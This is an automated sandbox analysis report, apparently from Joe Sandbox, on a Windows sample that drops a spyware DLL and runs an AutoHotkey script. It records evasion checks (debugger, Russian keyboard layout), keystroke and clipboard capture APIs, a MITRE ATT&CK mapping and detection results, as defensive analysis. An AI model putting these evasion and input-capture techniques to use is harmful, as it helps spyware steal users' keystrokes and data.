Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe TID: 4680

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9ED5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9FD0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9D7C.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00418B10 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 00418C0Ch country: Russian (ru)

14_2_00418B10

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	API coverage: 6.1 %
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	API coverage: 4.8 %

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_049DF7A8 GetSystemInfo,

4_2_049DF7A8

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DD788 FindFirstFileW,FindClose,	4_2_049DD788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DD1BC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	4_2_049DD1BC
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047F410 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	14_2_0047F410
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047F380 FindFirstFileW,FindClose,GetFileAttributesW,	14_2_0047F380
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0044CF10 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	14_2_0044CF10
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0047F410 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	21_2_0047F410
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004370C0 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,	21_2_004370C0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0045D2E0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,	21_2_0045D2E0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0047F380 FindFirstFileW,FindClose,GetFileAttributesW,	21_2_0047F380
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047BFA00 FindFirstFileW,FindClose,	25_2_047BFA00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047BF434 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	25_2_047BF434

Source: C:\Windows\SysWOW64\msiexec.exe	API call chain: ExitProcess graph end node	graph_4-7593
Source: C:\Windows\SysWOW64\msiexec.exe	API call chain: ExitProcess graph end node	graph_4-7217
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	API call chain: ExitProcess graph end node	graph_14-27293
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: msiexec.exe, 00000004.00000002.897365921.000000000093F000.00000004.00000020.sdmp, WerFault.exe, 00000012.00000003.868980705.0000000004D4B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: nMv8.exe, 0000000E.00000003.828884196.0000000000AD7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_004A01D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

14_2_004A01D7

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

14_2_00450890

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 21_2_004A777E __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

21_2_004A777E

Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00414200 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,

14_2_00414200

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A01D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_004A01D7
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0049C7D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0049C7D5
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004A27E2 SetUnhandledExceptionFilter,	21_2_004A27E2
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004A01D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_004A01D7

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00417970 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW,

14_2_00417970

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

14_2_0043A5E0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk			Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00417220 mouse_event,

14_2_00417220

Source: msiexec.exe, 00000004.00000000.838914613.0000000003190000.00000002.00020000.sdmp, nMv8.exe	Binary or memory string: Program Manager
Source: nMv8.exe	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000004.00000000.838914613.0000000003190000.00000002.00020000.sdmp, nMv8.exe	Binary or memory string: Progman
Source: nMv8.exe, 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000015.00000000.860090595.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.889151958.00000000004AC000.00000002.00020000.sdmp, Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Binary or memory string: 1ATextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1IndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAll...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264MasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWMonitorCountMonitorPrimaryMonitorMonitorWorkAreaMonitorNameAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightShowAddRenameCheckUncheckToggleCheckEnableDisableToggleEnableStandardNoStandardColorNoDefaultDeleteAllTipIconNoIconMainWindowNoMainWindowSubmitCancelHideMinimizeMaximizeRestoreDestroyMarginFontListViewTreeViewFlashNewMoveMoveDrawFocusChooseChooseStringPosFocusVEnabledVisibleHwndNameButtonCheckboxRadioDDLDropDownListComboBoxListBoxUpDownSliderTab2Tab3GroupBoxPicPictureDateTimeMonthCalStatusBarActiveXLinkCustomPriorityInterruptNoTimersCloseWaitCloseStyleExStyleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceListLineCountCurrentLineCurrentColSelectedEjectLockUnlockLabelFileSystemFSSetLabel:SerialTypeStatusStatusCDCapacityCapTrans
Source: msiexec.exe, 00000004.00000000.838914613.0000000003190000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	4_2_049DD8D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_049DCD60
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	25_2_047BFB50
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	25_2_047BEFD8

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_049D7CA4 cpuid

4_2_049D7CA4

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_004A2CB8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

14_2_004A2CB8

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_049DF7BC GetVersion,

4_2_049DF7BC

Source: nMv8.exe	Binary or memory string: WIN_XP
Source: nMv8.exe	Binary or memory string: WIN_VISTA
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi`
Source: nMv8.exe	Binary or memory string: WIN_7
Source: nMv8.exe	Binary or memory string: WIN_8
Source: nMv8.exe	Binary or memory string: WIN_8.1

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0041DB10 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,		14_2_0041DB10
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0041D130 Shell_NotifyIconW,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free,		21_2_0041D130

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Native API2	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture121	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter3	Registry Run Keys / Startup Folder1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Access Token Manipulation1	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture121	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection12	DLL Side-Loading1	NTDS	System Information Discovery46	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading31	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Virtualization/Sandbox Evasion2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll	27%	ReversingLabs	Win32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\u0IjY7UrZ\Vk5OSNAZ1qGr0gp2STA6jj7mn	6%	Metadefender		Browse
C:\Users\user\AppData\Roaming\u0IjY7UrZ\Vk5OSNAZ1qGr0gp2STA6jj7mn	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.movable-type.co.uk/scripts/xxtea.pdf	0%	Avira URL Cloud	safe
http://192.168.0.108:80/	0%	Avira URL Cloud	safe
http://192.168.0.108/#n	0%	Avira URL Cloud	safe
http://192.168.0.108	0%	Avira URL Cloud	safe
http://192.168.0.108U	0%	Avira URL Cloud	safe
http://www.indyproject.org/	0%	URL Reputation	safe
http://www.movable-type.co.uk/scripts/xxtea.pdfS	0%	Avira URL Cloud	safe
http://192.168.0.108/lWr	0%	Avira URL Cloud	safe
http://192.168.0.108/	0%	Avira URL Cloud	safe
https://autohotkey.comCould	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.59.81	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ipinfo.io/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
